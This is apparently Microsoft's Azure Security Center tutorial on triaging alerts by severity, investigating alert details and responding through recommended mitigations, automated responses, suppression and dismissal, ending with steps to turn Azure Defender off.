Tutorial: Triage, investigate, and respond to security alerts

Security Center continuously analyzes your hybrid cloud workloads using advanced analytics and threat intelligence to alert you about potentially malicious activities in your cloud resources. You can also integrate alerts from other security products and services into Security Center. Once an alert is raised, swift action is needed to investigate and remediate the potential security issue.

In this tutorial, you will learn how to:

  • Triage security alerts
  • Investigate a security alert to determine the root cause
  • Respond to a security alert and mitigate that root cause

If you don't have an Azure subscription, create a free account before you begin.

Prerequisites

To step through the features covered in this tutorial, you must have Azure Defender enabled. You can try Azure Defender at no cost. To learn more, see the pricing page. The quickstart Get started with Security Center walks you through how to upgrade.

Triage security alerts

Security Center provides a unified view of all security alerts. Security alerts are ranked based on the severity of the detected activity.

Triage your alerts from the Security alerts page:

Security alerts list page

Use this page to review the active security alerts in your environment to decide which alert to investigate first.

When triaging security alerts, prioritize alerts based on the alert severity by addressing alerts with higher severity first. Learn more about alerts severity in How are alerts classified?.

Tip

You can connect Azure Security Center to most popular SIEM solutions including Azure Sentinel and consume the alerts from your tool of choice. Learn more in Stream alerts to a SIEM, SOAR, or IT Service Management solution.

Investigate a security alert

When you've decided which alert to investigate first:

  1. Select the desired alert.

  2. From the alert overview page, select the resource to investigate first.

  3. Begin your investigation from the left pane, which shows the high-level information about the security alert.

    The left pane of the alert details page highlighting the high-level information

    This pane shows:

    • Alert severity, status, and activity time
    • Description that explains the precise activity that was detected
    • Affected resources
    • Kill chain intent of the activity on the MITRE ATT&CK matrix
  4. For more detailed information that can help you investigate the suspicious activity, examine the Alert details tab.

  5. When you've reviewed the information on this page, you may have enough to proceed with a response. If you need further details:

    • Contact the resource owner to verify whether the detected activity is a false positive.
    • Investigate the raw logs generated by the attacked resource

Respond to a security alert

After investigating an alert and understanding its scope, you can respond to security alert from within Azure Security Center:

  1. Open the Take action tab to see the recommended responses.

    Security alerts take action tab

  2. Review the Mitigate the threat section for the manual investigation steps necessary to mitigate the issue.

  3. To harden your resources and prevent future attacks of this kind, remediate the security recommendations in the Prevent future attacks section.

  4. To trigger a logic app with automated response steps, use the Trigger automated response section.

  5. If the detected activity isn’t malicious, you can suppress future alerts of this kind using the Suppress similar alerts section.

  6. When you've completed the investigation into the alert and responded in the appropriate way, change the status to Dismissed.

    Setting an alert's status

    This removes the alert from the main alerts list. You can use the filter from the alerts list page to view all alerts with Dismissed status.

  7. We encourage you to provide feedback about the alert to Microsoft:

    1. Marking the alert as Useful or Not useful.

    2. Select a reason and add a comment.

      Provide feedback to Microsoft on the usefulness of an alert

    Tip

    We review your feedback to improve our algorithms and provide better security alerts.

End the tutorial

Other quickstarts and tutorials in this collection build upon this quickstart. If you plan to continue to work with subsequent quickstarts and tutorials, keep automatic provisioning and Azure Defender enabled.

If you don't plan to continue, or you want to disable either of these features:

  1. Return to the Security Center main menu and select Pricing and settings.
  2. Select the relevant subscription.
  3. To downgrade, select Azure Defender off.
  4. To disable automatic provisioning, open the Data Collection page and set Auto provisioning to Off.
  5. Select Save.

Note

Disabling automatic provisioning does not remove the Log Analytics agent from Azure VMs that already have the agent. Disabling automatic provisioning limits security monitoring for your resources.

Next steps

In this tutorial, you learned about Security Center features to be used when responding to a security alert. For related material see: